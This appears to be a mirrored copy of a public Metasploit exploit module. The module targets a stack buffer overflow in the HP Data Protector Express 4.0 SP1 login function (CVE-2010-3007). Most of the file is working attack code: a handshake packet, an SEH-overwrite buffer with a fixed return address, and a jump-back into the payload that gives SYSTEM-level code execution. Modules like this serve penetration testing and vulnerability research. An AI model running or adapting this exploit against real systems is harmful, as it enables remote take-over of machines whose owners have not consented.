CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'HP Data Protector DtbClsLogin Buffer Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The16overflow occurs during the login process, in the DtbClsLogin function provided by17the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an18insecure way with the username. A successful exploitation will lead to code execution19with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server20Service) process, which runs as SYSTEM by default.21},22'Author' =>23[24'AbdulAziz Hariri', # Vulnerability discovery25'juan vazquez' # Metasploit module26],27'References' =>28[29[ 'CVE', '2010-3007' ],30[ 'OSVDB', '67973' ],31[ 'BID', '43105' ],32[ 'ZDI', '10-174' ],33[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535' ]34],35'Payload' =>36{37'Space' => 712,38'BadChars' => "\x00",39'DisableNops' => true40},41'Platform' => 'win',42'Targets' =>43[44['HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3',45{46'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)47'Offset' => 71248}49]50],51'DefaultTarget' => 0,52'Privileged' => true,53'DisclosureDate' => '2010-09-09'54))55register_options(56[57Opt::RPORT(3817),58])59end6061def check62connect6364machine_name = rand_text_alpha(15)6566print_status("#{sock.peerinfo} - Sending Hello Request")67hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"68hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"69hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"70hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"71hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"72hello << "\x00\x00\x00\x00"73hello << machine_name << "\x00"74hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"75hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"76hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"7778sock.put(hello)79hello_response = sock.get_once(-1, 10)80disconnect8182if hello_response and hello_response =~ /Dtb: Context/83return Exploit::CheckCode::Detected84end8586return Exploit::CheckCode::Safe8788end8990def exploit9192connect9394machine_name = rand_text_alpha(15)9596print_status("#{sock.peerinfo} - Sending Hello Request")97hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"98hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"99hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"100hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"101hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"102hello << "\x00\x00\x00\x00"103hello << machine_name << "\x00"104hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"105hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"106hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"107108sock.put(hello)109hello_response = sock.get_once(-1, 10)110111if not hello_response or hello_response.empty?112print_error("#{sock.peerinfo} - The Hello Request hasn't received a response")113return114end115116bof = payload.encoded117bof << rand_text(target['Offset']-bof.length)118bof << generate_seh_record(target.ret)119bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset']+8}").encode_string120# The line below is used to trigger exception, don't go confused because of the big space,121# there are only some available bytes until the end of the stack, it allows to assure exception122# when there are mappings for dynamic memory after the stack, so to assure reliability it's better123# to jump back.124bof << rand_text(100000)125126header = [0x8451].pack("V") # packet id127header << [0x32020202].pack("V") # svc id128header << [0x00000018].pack("V") # cmd id129header << [0].pack("V") # pkt length, calculated after pkt has been built130header << "\x00\x00\x00\x00" # ?Unknown?131132pkt_auth = header133pkt_auth << bof # username134135pkt_auth[12, 4] = [pkt_auth.length].pack("V")136137print_status("#{sock.peerinfo} - Sending Authentication Request")138139sock.put(pkt_auth)140disconnect141end142end143144145